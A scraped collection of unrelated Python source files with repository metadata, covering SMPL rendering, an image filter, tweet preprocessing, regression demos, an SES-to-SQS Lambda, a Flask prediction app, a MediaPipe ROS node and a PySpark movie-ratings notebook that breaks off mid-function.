glob_ori = torch.from_numpy(R.from_rotvec(glob_ori.cpu().detach().numpy().reshape(-1, 3)).as_matrix())[None].cuda().float()
faces = body_model.faces
gt = gt.detach().cpu().numpy()
for cam_idx in range(4):
image = images[0, cam_idx]
# Get camera information
camera_info = camera[cam_idx][0]
pose = camera_info.R
intrinsics = camera_info.K
transl = (camera_info.t.reshape(3)) / 1e3
transl[0] *= -1 # Adjust x-axis translation
# Change body orientation so that camera matrix to be identical
rot = torch.from_numpy(pose).to(device=glob_ori.device, dtype=glob_ori.dtype)
glob_ori_R = rot @ glob_ori
pred_output_ = body_model(betas=betas, body_pose=body_pose, global_orient=glob_ori_R, pose2rot=False)
# Match and tranform keypoints gt and pred
loc_gt = gt @ pose.T
loc_pred_ = pred_output_.joints[:, 25:][:, constants.SMPL_TO_H36].detach().cpu().numpy() * 1e3
loc_diff = loc_gt[:, 14] - loc_pred_[:, 14]
loc_pred_ = loc_pred_ + loc_diff
vertices = pred_output_.vertices[0].detach().cpu().numpy()
vertices = vertices + loc_diff / 1e3
if save_org:
cv2.imwrite('demo_figs/render_sample_%03d_org_%d.png'%(iters, cam_idx+1), image[:, :, ::-1])
filename = 'demo_figs/render_sample_%03d_%d.png'%(iters, cam_idx+1)
image_org = image[:, :, ::-1].copy()
render_smpl(vertices, faces, image[:, :, ::-1], intrinsics, np.eye(3), transl, filename=filename)
| yohanshin/Pseudo-SMPL-GT | utils/visualization.py | visualization.py | py | 3,955 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyrender.MetallicRoughnessMaterial",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "trimesh.Trimesh",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "trimesh.transformations.rotation_matrix",
"line_number": 28,
"usage_type": "call"
},... |
11038838210 | #!/usr/bin/env python
# coding: utf-8
# # Filter #1: Broken Frame 🔨
# My broken_frame() function creates a fractured effect in the image below that I liken in appearance to the Distorted Glass filter in Photoshop.
import PIL.ImageOps
from PIL import Image
def broken_frame(image):
length = image.size[1]
for x in range(image.size[0]):
for y in range(length - x):
left = image.getpixel((x, y))
right = image.getpixel((length - 1 - x, y))
image.putpixel((length - 1 - x, y), left)
image.putpixel((x, y), right)
testimage = Image.open('black girls in ux.png')
testimage
broken_frame(testimage)
testimage
| mars-aria/vfx-filters | broken-frame filter/broken-frame_filter.py | broken-frame_filter.py | py | 677 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 20,
"usage_type": "name"
}
] |
41674825810 | '''
--- Changes for this version ---
- change to save in txt format, as saved format no longer a valid json format
- removed the open and end line, only take tweet object
'''
# used material: workshop solution from past course in UniMelb (COMP20008): https://edstem.org/au/courses/9158/lessons/25867/slides/185032/solution
# packages: ijson https://pypi.org/project/ijson/
# simplejson https://pypi.org/project/simplejson/
# nltk https://www.nltk.org/
# re https://docs.python.org/3/library/re.html
# zipfile https://docs.python.org/3/library/zipfile.html
# used sal.json provided in Assignment 1
# used Bingguang and Arezoo's code for Assignment 1
##########################################################
# Refer to: regular expression document: https://www.w3schools.com/python/python_regex.asp
# keywords from: https://www.merriam-webster.com/thesaurus/volunteer
# deal with zip file: https://stackoverflow.com/questions/40824807/reading-zipped-json-files
# convert decimal in json: https://stackoverflow.com/questions/11875770/how-to-overcome-datetime-datetime-not-json-serializable and https://stackoverflow.com/questions/1960516/python-json-serialize-a-decimal-object
import ijson
import simplejson as json
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import re
from zipfile import ZipFile
import os
nltk.download('punkt')
nltk.download('stopwords')
# variables
SAL_PATH = 'data/sal.json'
output_path = 'preprocessed.json'
INPUT_PATH = 'data/twitter-huge.json.zip'
# create keywords dictionary, do stemmer step by nltk
keywords = ["voluntary", "volunteer", "volunteering", "nonprofit", "charity", "donor", "donation", "unpaid", "rendering", "bestowing", "volitional"]
porterStemmer = PorterStemmer()
keywords = set([porterStemmer.stem(w) for w in keywords])
stop_words = set(stopwords.words('english'))
'''
get string content, do nlp process:
- clean the content string
- tokenize
- remove stop words
- stem
--------------------------------------
code adapt from previous course in uniMelb workshop solution:
https://edstem.org/au/courses/9158/lessons/25867/slides/185032/solution
--------------------------------------
Args:
content (string): content need to process
Return:
stemmed (list): a list of words processed as described above
'''
def nlp_content(content):
out = re.sub(r'non-profit', 'nonprofit', content.lower())
out = re.sub(r'https:\/\/[^\s]+', '', out) # remove link
out = re.sub(r'[^A-z\s]', ' ', out) # remove all non-english character words
out = re.sub(r'\s+', ' ', out) # deal with multiple space
tokens = nltk.word_tokenize(out) # tokenisation
# stop words removal
no_stop_words = [w for w in tokens if w not in stop_words]
# Stemming
stemmed = [porterStemmer.stem(w) for w in no_stop_words]
return stemmed
'''
determine if a tweet as related content
-----------------------------------------
rules: if content mentioned words in key-word dictionary,
it is related, otherwise is not
-----------------------------------------
Args:
content (list): output of the nlp_content
Return:
True/False (related/not related)
'''
def determine_related(content):
    """Return True when any stemmed token appears in the keyword set."""
    return any(token in keywords for token in content)
'''
convert raw tweet record to contain only information needed
----------------------------------------------------------
rules:
- each tweet record after process will contain:
- user id
- content: string value
- place
- state: matched by sal.json
- related: as described above
- if tweet doesn't have any one of following, ignore:
- user id
- place
- language is not 'en'
- if no place name matched in sal.json, ignore record
---------------------------------------------------------------------
Args:
record: twitter data single record
Retrun:
out: processed tweet
'''
def convert_record(record):
    """Reduce a raw tweet record to {uid, content, place, state, related}.

    Returns False when the tweet lacks an author id or place, is not
    English, or its place name is not matched in sal.json.
    """
    try:
        uid = record['doc']['data']['author_id']
        # First component of the full place name, lower-cased for matching.
        place = record['doc']['includes']['places'][0]['full_name'].split(',')[0].lower()
        lang = record['doc']['data']['lang']
        state = -1
        # state_dict maps state code -> list of place names (built from sal.json).
        for k, v in state_dict.items():
            if place in v:
                state = k
                break
        if state == -1 or lang != 'en':
            return False
    except:
        # Missing author_id / place / lang keys: drop the record.
        return False
    try:
        #original_content = BeautifulSoup(record['doc']['data']['text'], 'html.parser').text
        original_content = record['doc']['data']['text']
        content = nlp_content(original_content)
        related = 0 if not determine_related(content=content) else 1
    except:
        # Best effort: keep the record but mark it unrelated with empty text.
        original_content = ''
        related = 0
    out = dict()
    out['uid'] = uid
    out['content'] = original_content
    out['place'] = place
    out['state'] = state
    out['related'] = related
    return out
'''
load sal.json file. Use Bingguang and Arezoo's code for Assignment 1.
'''
# Build state_dict from sal.json: state code -> list of suburb/place names.
with open(SAL_PATH) as fsal:
    sal_items = ijson.items(fsal, '')
    state_dict = {'1': [], '2': [], '3': [], '4': [], '5': [], '6': [], '7': [], '8': [], '9': []}
    for item in sal_items:
        for k, v in item.items():
            state_dict[v['ste']].append(k)
# write processed data into preprocessed.json
#output_path = 'preprocessed.json'
try:
    # Start from a clean output file; ignore the error if it does not exist.
    os.remove(output_path)
except:
    pass
out = open(output_path, 'a')
out.write('[')  # the output file is one big JSON array
count = 1
# NOTE(review): `zip` shadows the builtin name within this block.
with ZipFile(INPUT_PATH, 'r') as zip:
    with zip.open(zip.namelist()[0]) as f:
        # Stream records so the huge twitter dump never sits fully in memory.
        items = ijson.items(f, 'rows.item')
        for record in items:
            record = convert_record(record)
            if record != False:
                js_out = json.dumps(record)
                if count != 1:
                    out.write(', \n')  # comma-separate array elements
                out.write(js_out)
                count += 1
                if count % 10000 == 0:
                    print(count, 'has been dealt with')
out.write(']')
out.close()
| Juaneag/COMP90024-Assignment2-Team39 | twitter/preprocess.py | preprocess.py | py | 5,927 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.download",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "nltk.stem.porter.PorterStemmer",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "nltk.corpu... |
23480037190 | from typing import List
class Solution:
    @staticmethod
    def combinationSum(candidates: List[int], target: int) -> List[List[int]]:
        """Return every combination of candidates (reuse allowed) that sums to target.

        The original defined this as an instance method but invoked it as a
        bare module-level name, which raised NameError; it is now a
        staticmethod called through the class.
        """
        answer = []

        def dfs(remaining, start, partial):
            # Overshot the target: this path cannot succeed.
            if remaining < 0:
                return
            # Exact hit: record the combination found so far.
            elif remaining == 0:
                answer.append(partial)
                return
            # Candidates may repeat, so recursion restarts from `index`,
            # not `index + 1`.
            for index in range(start, len(candidates)):
                dfs(remaining - candidates[index], index,
                    partial + [candidates[index]])

        dfs(target, 0, [])
        return answer


result = Solution.combinationSum(candidates=[2, 3, 6, 7], target=7)
print(result)
| raddaslul/basic_algoritm | hikers/combination_sum.py | combination_sum.py | py | 1,231 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
}
] |
11737753941 | import pandas as pd
import numpy as np
from rdkit import Chem
# 1. sdfファイルの名前を指定
# ex. ChemCupid_Namiki.sdf
filename = 'ChemCupid_Namiki'
# -----------------------------------------
def main():
    """Read `{filename}.sdf`, convert each molecule to SMILES, write a CSV.

    Fix: the `filename` constant configured at the top of the script was
    never interpolated into the f-strings, so the configured name was
    ignored.
    """
    # SDMolSupplier yields None for entries RDKit fails to parse; skip them.
    mols = [mol for mol in Chem.SDMolSupplier(
        f'{filename}.sdf') if mol is not None]
    smiles = [Chem.MolToSmiles(mol) for mol in mols]
    df = pd.DataFrame({'SMILES': smiles})
    print(f'output to {filename}.csv')
    df.to_csv(f'{filename}.csv')


main()
| yuito118/share-chemo | sdfToSmiles.py | sdfToSmiles.py | py | 488 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rdkit.Chem.SDMolSupplier",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "rdkit.Chem",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "rdkit.Chem.MolToSmiles",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "rdkit.Chem... |
30097509663 | """Script for demonstrating polynomial regression.
Data obtained from: https://www.kaggle.com/karthickveerakumar/salary-data-simple-linear-regression
"""
import csv
import numpy as np
import matplotlib.pyplot as plt
NUM_ITERS = 250
ALPHA = 0.01
def main():
    """Train a degree-9 polynomial regression with gradient descent.

    Loads the data, scales features, then runs NUM_ITERS descent steps,
    re-plotting the fitted curve after every update.
    """
    X, y = load_data()
    X, stds = scale_features(X)
    theta = np.zeros((10, 1))
    plot(X, y, theta, 0, stds)
    for step in range(NUM_ITERS):
        theta = theta - ALPHA * compute_grad(X, y, theta)
        plot(X, y, theta, step + 1, stds)
    plt.show()
def load_data():
    """Load the training set from Salary_Data.csv.

    Returns X of shape (m, 10) — bias column followed by years^1..years^9 —
    and y of shape (m, 1).
    """
    features = []
    targets = []
    with open("Salary_Data.csv") as csv_file:
        reader = csv.reader(csv_file)
        next(reader)  # skip the header row
        for row in reader:
            years = float(row[0])
            # years ** 0 == 1 supplies the bias term x0.
            features.append([years ** power for power in range(10)])
            targets.append(float(row[1]))
    X = np.asarray(features).reshape((len(features), 10))
    y = np.asarray(targets).reshape((len(targets), 1))
    return X, y
def scale_features(X):
    """Divide each column of X by its standard deviation and return both.

    The bias column x0 is left untouched (its divisor is forced to 1).
    """
    stds = np.std(X, axis=0)
    stds[0] = 1  # never scale the bias column
    return X / stds, stds
def compute_cost(X, y, theta):
    """Return the scalar least-squares cost J(theta) = (1/2m)·‖Xθ − y‖²."""
    m = X.shape[0]
    residuals = np.matmul(X, theta) - y
    return np.squeeze(np.matmul(residuals.T, residuals) / (2 * m))
def compute_grad(X, y, theta):
    """Return the gradient (1/m)·Xᵀ(Xθ − y) of the cost w.r.t. theta."""
    m = X.shape[0]
    residuals = np.matmul(X, theta) - y
    return np.matmul(X.T, residuals) / m
def predict(num_years, theta, stds):
    """Predicts salary given num_years of experience using the parameters.

    Builds the same degree-9 feature vector as training (num_years^0..^9),
    applies the stored feature scaling, and evaluates the model.
    """
    features = np.asarray(
        [num_years ** power for power in range(10)]).reshape((1, 10))
    return np.squeeze(np.matmul(features / stds, theta))
def plot(X, y, theta, iter, stds):
    """Redraw the scatter of the training set plus the current fitted curve."""
    plt.clf()
    plt.title(f"Iter: {iter} - Cost: {compute_cost(X, y, theta)}")
    # Undo the feature scaling on the x-axis so the plot shows raw years.
    plt.scatter(X[:, 1] * stds[1], y)
    xs = [i / 10 for i in range(115)]
    ys = [predict(x, theta, stds) for x in xs]
    plt.plot(xs, ys)  # the non-linear fitted curve
    plt.xlim(0, 11.5)
    plt.ylim(0, 150000)
    plt.pause(0.1)
if __name__ == "__main__":
main()
| JhihYangWu/ML-Practice | 03 Polynomial Regression/polynomial_regression.py | polynomial_regression.py | py | 2,912 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "csv.reader",
... |
7047886953 | import base64
import json
import boto3
import uuid
from botocore.client import Config
def lambda_handler(event, context):
    """Re-queue SES delivery receipts from SNS onto the Celery SQS queue.

    For every SNS record in the event, build a Celery task message
    ("process-ses-result") carrying the SNS message as its only argument
    and push it, base64-encoded, to the delivery-receipts queue.
    """
    config = Config(connect_timeout=15, retries={'max_attempts': 3})
    sqs = boto3.resource('sqs', config=config)
    queue = sqs.get_queue_by_name(
        QueueName='eks-notification-canada-cadelivery-receipts'
    )
    print("Queue {}".format(queue))
    print("Task has begun")
    for record in event["Records"]:
        # Celery task body; only task name, id and args carry real payload,
        # the rest are protocol-required defaults.
        task = {
            "task": "process-ses-result",
            "id": str(uuid.uuid4()),
            "args": [
                {
                    "Message": record["Sns"]["Message"]
                }
            ],
            "kwargs": {},
            "retries": 0,
            "eta": None,
            "expires": None,
            "utc": True,
            "callbacks": None,
            "errbacks": None,
            "timelimit": [
                None,
                None
            ],
            "taskset": None,
            "chord": None
        }
        # Transport envelope: the task body itself is base64-encoded JSON
        # (body_encoding "base64"), as the Celery SQS transport expects.
        envelope = {
            "body": base64.b64encode(bytes(json.dumps(task), 'utf-8')).decode("utf-8"),
            "content-encoding": "utf-8",
            "content-type": "application/json",
            "headers": {},
            "properties": {
                "reply_to": str(uuid.uuid4()),
                "correlation_id": str(uuid.uuid4()),
                "delivery_mode": 2,
                "delivery_info": {
                    "priority": 0,
                    "exchange": "default",
                    "routing_key": "delivery-receipts"
                },
                "body_encoding": "base64",
                "delivery_tag": str(uuid.uuid4())
            }
        }
        # The whole envelope is base64-encoded again for the SQS message body.
        msg = base64.b64encode(bytes(json.dumps(envelope), 'utf-8')).decode("utf-8")
        queue.send_message(MessageBody=msg)
        print("Record has moved to call process-ses-result")
    print("Task has ended")
    return {
        'statusCode': 200
    }
| cds-snc/notification-lambdas | sesemailcallbacks/ses_to_sqs_email_callbacks.py | ses_to_sqs_email_callbacks.py | py | 1,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "botocore.client.Config",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "boto3.resource",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "base64.b64encode",
... |
71508824103 | from wsgiref import simple_server
from flask import Flask, request, render_template,url_for, app
from flask import Response
from flask_cors import CORS, cross_origin
from logistic_deploy import predObj
import os
import json
app = Flask(__name__)
CORS(app)
app.config['DEBUG'] = True
class ClientApi:
    """Thin holder that owns the predObj instance used by the routes."""

    def __init__(self):
        self.predObj = predObj()
@app.route("/Train", methods=['POST'])
#@app.route("/")
#def home():
#return ClientApi()
def predictRoute():
try:
if request.json['data'] is not None:
data = request.json['data']
print('data is: ', data)
pred=predObj()
res = pred.predict_log(data)
result = clntApp.predObj.predict_log(data)
print('result is ',res)
return Response(res)
except ValueError:
return Response("Value not found")
except Exception as e:
print('exception is ',e)
return Response(e)
@app.route("/singlevaluepred", methods=['POST'])
def predict():
if request.method == 'POST':
Intercept = (request.form["Intercept"])
occ_2 = float(request.form["occ_2"])
occ_3 = float(request.form["occ_3"])
occ_4 = float(request.form["occ_4"])
occ_5 = float(request.form["occ_5"])
occ_6 = float(request.form["occ_6"])
occ_husb_2 = float(request.form["occ_husb_2"])
occ_husb_3 = float(request.form["occ_husb_3"])
occ_husb_4 = float(request.form["occ_husb_4"])
occ_husb_5 = float(request.form["occ_husb_5"])
occ_husb_6 = float(request.form["occ_husb_6"])
rate_marriage = float(request.form["rate_marriage"])
age = float(request.form["age"])
yrs_married = float(request.form["yrs_married"])
children = float(request.form["children"])
religious = float(request.form["religious"])
educ = float(request.form["educ"])
data = np.array([[Intercept, occ_2, occ_3, occ_4, occ_5,
occ_6, occ_husb_2, occ_husb_3, occ_husb_4, occ_husb_5, occ_husb_6, rate_marriage
, age, yrs_married, children, religious, educ]])
my_prediction = classifier.predict(data)
return render_template(prediction=my_prediction)
if __name__ == "__main__":
clntApp = ClientApi()
app = app.run()
host = '0.0.0.0'
port = 5000
app.run(debug=True)
httpd = simple_server.make_server(host, port, app)
print("Serving on %s %d" % (host, port))
httpd.serve_forever()
| amitranjasahoo12/logistics-regression | app.py | app.py | py | 2,548 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.app",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask.app",
"line_number": ... |
2954317677 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python標準ライブラリ
import cv2
from cv_bridge import CvBridge, CvBridgeError
# Python追加ライブラリ
import mediapipe as mp
# ROSに関するライブラリ
import rospy
from sensor_msgs.msg import CompressedImage
class HandDetection():
    """Subscribes to the HSR head camera and draws MediaPipe hand landmarks."""

    def __init__(self):
        # MediaPipe hands solution plus drawing helpers and styles.
        self.mp_hands = mp.solutions.hands
        self.mp_drawing = mp.solutions.drawing_utils
        self.mesh_drawing_spec = self.mp_drawing.DrawingSpec(thickness=2, color=(0, 255, 0))
        self.mark_drawing_spec = self.mp_drawing.DrawingSpec(thickness=3, circle_radius=3, color=(0, 0, 255))
        self.cv_bridge = CvBridge()
        self.sub = rospy.Subscriber("/hsrb/head_rgbd_sensor/rgb/image_rect_color/compressed", CompressedImage, self.main)

    def main(self, msg):
        """Image callback: detect up to two hands, draw, display and save."""
        observed_img = self.cv_bridge.compressed_imgmsg_to_cv2(msg)
        image = cv2.resize(observed_img, dsize=None, fx=0.3, fy=0.3)
        # MediaPipe expects RGB input while OpenCV delivers BGR.
        rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        # Draw onto a copy so the raw frame stays untouched.
        self.annotated_image = image.copy()
        with self.mp_hands.Hands(max_num_hands=2, min_detection_confidence=0.5,
                                 static_image_mode=True) as hands_detection:
            results = hands_detection.process(rgb_image)
            # Fix: multi_hand_landmarks is None when no hand is detected;
            # iterating it unguarded raised a TypeError on empty frames.
            if results.multi_hand_landmarks:
                for hand_landmarks in results.multi_hand_landmarks:
                    self.mp_drawing.draw_landmarks(
                        image=self.annotated_image,
                        landmark_list=hand_landmarks,
                        connections=self.mp_hands.HAND_CONNECTIONS,
                        landmark_drawing_spec=self.mark_drawing_spec,
                        connection_drawing_spec=self.mesh_drawing_spec
                    )
        self.save_data(self.annotated_image)
        cv2.imshow('Detection Result', self.annotated_image)
        cv2.waitKey(1)

    def save_data(self, img):
        """Write the annotated frame to disk."""
        cv2.imwrite('../data/result_ros.jpg', img)
        return
if __name__ == "__main__":
rospy.init_node('mediapipe_ros')
mediapipe_ros = HandDetection()
rospy.spin()
| Shoichi-Hasegawa0628/mediapipe_ros | src/main_ros.py | main_ros.py | py | 2,503 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mediapipe.solutions",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "mediapipe.solutions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "cv_bridge.CvBridge",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "... |
31916197135 | #!/usr/bin/env python
# coding: utf-8
# # Technical test results for HEVA company
# This notebook repeats the statement of the test. Under each activity you will find the code and the result produced.
# You will find all the requirements to run this notebook in the requirements.md file.
# ## Configuration
# ### 1. Importing packages
# In[1]:
# Import necessary modules
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
from pyspark.sql.functions import col, when, explode, split, desc, from_unixtime, year
from pyspark.sql.types import DateType
import time
import sys
import contextlib
# ### 2. Settings
# In[2]:
# Definition of necessary parameters
data_path = "../sources/data/movies.sqlite"
output_log_path = "result.log"
# In[3]:
class Logger:
    """File-like object that tees every write to stdout and to a log file."""

    def __init__(self, filename):
        self.console = sys.stdout
        self.file = open(filename, 'a')

    def write(self, message):
        # Mirror the message to both sinks.
        for sink in (self.console, self.file):
            sink.write(message)

    def flush(self):
        for sink in (self.console, self.file):
            sink.flush()
# ### 3. Reading data
# In[4]:
def read_data(data_path):
    """Open a Spark session with the sqlite JDBC driver and load both tables.

    Args:
        data_path (string): The sqlite data file path

    Returns:
        tuple: (movies, ratings) Pyspark DataFrames
    """
    spark = SparkSession.builder\
        .config(
            'spark.jars.packages',
            'org.xerial:sqlite-jdbc:3.34.0')\
        .getOrCreate()

    def load_table(table_name):
        # Both tables share the same driver and url; only dbtable differs.
        return spark.read.format('jdbc').options(
            driver='org.sqlite.JDBC',
            dbtable=table_name,
            url=f'jdbc:sqlite:{data_path}')\
            .load()

    return load_table('movies'), load_table('ratings')
with contextlib.redirect_stdout(Logger(output_log_path)):
df_movies, df_ratings = read_data(data_path)
# ### 4. Data overview
# In[5]:
def preview_data(df_movies, df_ratings):
    """Print the first 20 rows of the movies and ratings tables.

    Args:
        df_movies (Dataframe): Movies Dataframe
        df_ratings (Dataframe): Ratings Dataframe
    """
    for label, frame in (("Movies table", df_movies),
                         ("Ratings table", df_ratings)):
        print(label)
        frame.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
preview_data(df_movies, df_ratings)
# ## Tasks
#
# ### 1. Counts
#
# - 1.1 How many films are in the database?
# In[6]:
def activity_1_1(df_movies):
    """Return the number of distinct movie titles in the database."""
    distinct_titles = df_movies.select("title").distinct()
    return distinct_titles.count()
with contextlib.redirect_stdout(Logger(output_log_path)):
result_1_1 = activity_1_1(df_movies)
print("There are", result_1_1, "movies in the database")
# - 1.2 How many different users are in the database?
# In[7]:
def activity_1_2(df_ratings):
    """Return the number of distinct user ids in the database."""
    distinct_users = df_ratings.select("user_id").distinct()
    return distinct_users.count()
with contextlib.redirect_stdout(Logger(output_log_path)):
result_1_2 = activity_1_2(df_ratings)
print("There are", result_1_2, "user id in the database")
# - 1.3 What is the distribution of the notes provided?
# **Bonus**: create a histogram.
# In[8]:
def activity_1_3(df_ratings):
    """Plot a histogram of the ratings and print the rating distribution."""
    print("Converting Dataframe to Pandas...")
    ratings_series = df_ratings.select("rating").toPandas().squeeze()
    plt.hist(ratings_series, bins=11)  # ratings span [0, 10] -> 11 bins
    plt.xlabel('Rating')
    plt.ylabel('Number of rating')
    plt.title('Histogram of rating')
    plt.show()
    print("Ratings distribution")
    df_ratings.groupBy("rating").count().orderBy("rating").show()
with contextlib.redirect_stdout(Logger(output_log_path)):
activity_1_3(df_ratings)
# - 1.4 Finally, we want to obtain a table of frequencies to express the distribution of notes as a percentage.
# In[9]:
def activity_1_4(df_ratings):
    """Print the ratings distribution as a table of percentages.

    Counts voters per rating, converts each count into a percentage of all
    ratings, and prints rating/percentage sorted by rating.

    Args:
        df_ratings (Dataframe): Rating Dataframe
    """
    df_ratings.groupBy("rating")\
        .count()\
        .withColumn(
            'percentage',
            (col("count")*100)/float(df_ratings.count()))\
        .select("rating", "percentage")\
        .orderBy("rating")\
        .show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Ratings frequencies")
activity_1_4(df_ratings)
# ### 2. Data selection and enrichment
#
# - 2.1 In order to set up a certain statistical model, we must transform the `rating` note into two modalities: did the user like the film or not?
# Create a new `liked` column in the `ratings` table with the following values: `0` for ratings [0-6] and `1` for ratings [7-10].
# In[10]:
def activity_2_1(df_ratings):
    """Add a binary `liked` column: 0 for ratings 0-6, 1 for ratings 7-10.

    Args:
        df_ratings (Dataframe): Ratings Dataframe

    Returns:
        Dataframe: Updated ratings Dataframe
    """
    # No `otherwise` clause is needed: the two `when` branches together
    # cover every possible rating value.
    df_ratings = df_ratings.withColumn(
        'liked',
        when(df_ratings.rating < 7, 0)
        .when(df_ratings.rating >= 7, 1))
    df_ratings.show()
    return df_ratings
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Updated ratings Dataframe")
df_ratings = activity_2_1(df_ratings)
# - 2.2 Which genres are rated highest by users? We want to get the **top 10** movie genres liked by users (using the new `liked` column).
# In[11]:
def activity_2_2(df_movies, df_ratings):
    """Print the top 10 movie genres by total `liked` count.

    The pipe-separated `genre` column is exploded into one row per genre,
    joined with the ratings, and the `liked` flags are summed per genre.

    Args:
        df_movies (Dataframe): Movies Dataframe
        df_ratings (Dataframe): Ratings Dataframe
    """
    df_movies.select(
        "movie_id",
        explode(
            split(
                col("genre"),
                "\|"))
        .alias("explode_genre"))\
        .join(
            df_ratings,
            df_ratings.movie_id == df_movies.movie_id,
            "inner")\
        .groupBy("explode_genre")\
        .sum("liked")\
        .withColumnRenamed("sum(liked)", "sum_liked")\
        .withColumnRenamed("explode_genre", "genre")\
        .sort(desc("sum_liked"))\
        .limit(10)\
        .show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Top 10 genres")
activity_2_2(df_movies, df_ratings)
# ### 3. Advanced Selections
#
# - 3.1 What are the titles of the films most popular with Internet users?
# We are looking for the **10** films with the best ratings on average by users, with a minimum of **5** ratings for the measurement to be relevant.
# In[12]:
def activity_3_1(df_movies, df_ratings):
    """Print the 10 best-rated movie titles (mean rating, min. 5 ratings).

    A ratings-per-title sub-join (alias title_count) filters out titles
    with fewer than 5 ratings before averaging, so the mean is meaningful.

    Args:
        df_movies (Dataframe): Movies Dataframe
        df_ratings (Dataframe): Ratings Dataframe
    """
    df_movies.join(
        df_ratings,
        df_movies.movie_id == df_ratings.movie_id,
        "inner").alias("movies_ratings")\
        .join(
            (df_movies.join(
                df_ratings,
                df_movies.movie_id == df_ratings.movie_id,
                "inner")
             .groupBy("title")
             .count()).alias("title_count"),
            col("movies_ratings.title") == col("title_count.title"),
            "inner")\
        .filter(col("count") >= 5)\
        .groupBy("movies_ratings.title")\
        .mean("rating")\
        .withColumnRenamed("avg(rating)", "mean_rating")\
        .sort(desc("mean_rating"))\
        .limit(10)\
        .show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Top 10 movies")
activity_3_1(df_movies, df_ratings)
# - 3.2 What is the most rated film in 2020?
# **Note**: the `rating_timestamp` column is provided in the database as [Unix time](https://fr.wikipedia.org/wiki/Heure_Unix).
# In[13]:
def activity_3_2(df_movies, df_ratings):
    """Print the single most-rated movie of 2020.

    rating_timestamp is Unix time; it is converted to a calendar year,
    filtered to 2020, and the votes are counted per title.

    Args:
        df_movies (Dataframe): Movies Dataframe
        df_ratings (Dataframe): Ratings Dataframe
    """
    df_ratings.withColumn(
        'rating_year',
        year(
            from_unixtime('rating_timestamp')
            .cast(DateType())))\
        .join(
            df_movies,
            df_ratings.movie_id == df_movies.movie_id)\
        .filter(col("rating_year") == 2020)\
        .groupBy("title")\
        .count()\
        .sort(desc("count"))\
        .withColumnRenamed("count", "rating_count")\
        .limit(1)\
        .show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Best film of the year 2020")
activity_3_2(df_movies, df_ratings)
# ### 4. Data management
#
# - 4.1 In order to find the notes of a particular user more quickly, we want to set up an index on the user ids.
# Do you see a performance difference when looking up the ratings given by user `255`?
# > Spark DataFrames are inherently unordered and do not support random access. (There is no built-in index concept like there is in pandas). Each row is treated as an independent collection of structured data, and this is what enables distributed parallel processing. So any executor can take any block of data and process it regardless of row order. [More info here](https://stackoverflow.com/questions/52792762/is-there-a-way-to-slice-dataframe-based-on-index-in-pyspark)
#
# Instead we can order the pyspark ratings dataframe according to the 'user_id' column. Otherwise the koalas package can be an alternative. Because Koala supports indexes and can be used for big data. Also, pandas cannot be scaled for big data oriented use.
#
# To check performance, I created the function time_test which print the execution time of a function.
# In[14]:
def time_test(func):
    """Run *func* 100 times and print min/mean/max wall-clock duration.

    Args:
        func (function): A zero-argument callable to benchmark
    """
    time_list = []
    for _ in range(100):
        # perf_counter is monotonic and higher-resolution than time.time,
        # which is the right choice for timing short code sections.
        start_time = time.perf_counter()
        # beginning of the code to test
        func()
        # end of the code to test
        time_list.append(time.perf_counter() - start_time)
    mean_time = sum(time_list) / len(time_list)
    max_time = max(time_list)
    min_time = min(time_list)
    print("min:", min_time, "mean:", mean_time, "max:", max_time, end="\n\n")
# In[15]:
def activity_4_1(df_ratings):
    """Compare lookup time for user 255 across indexed/unindexed frames.

    Spark DataFrames have no random-access index, so "indexed" here means
    ordered by user_id; the pandas conversion shows what a real index buys.

    Args:
        df_ratings (Dataframe): Ratings Dataframe
    """
    df_ratings_indexed = df_ratings.orderBy("user_id")
    print("Converting Dataframe to Pandas...")
    pandas_df_ratings = df_ratings.toPandas()
    pandas_df_ratings_indexed = pandas_df_ratings.set_index("user_id")
    print("Execution time for unindexed PYSPARK dataframe")
    time_test(lambda: df_ratings.filter(col("user_id") == 255))
    print("Execution time for PYSPARK dataframe indexed by 'user_id'")
    time_test(lambda: df_ratings_indexed.filter(col("user_id") == 255))
    print("Execution time for unindexed PANDAS dataframe")
    time_test(
        lambda: pandas_df_ratings
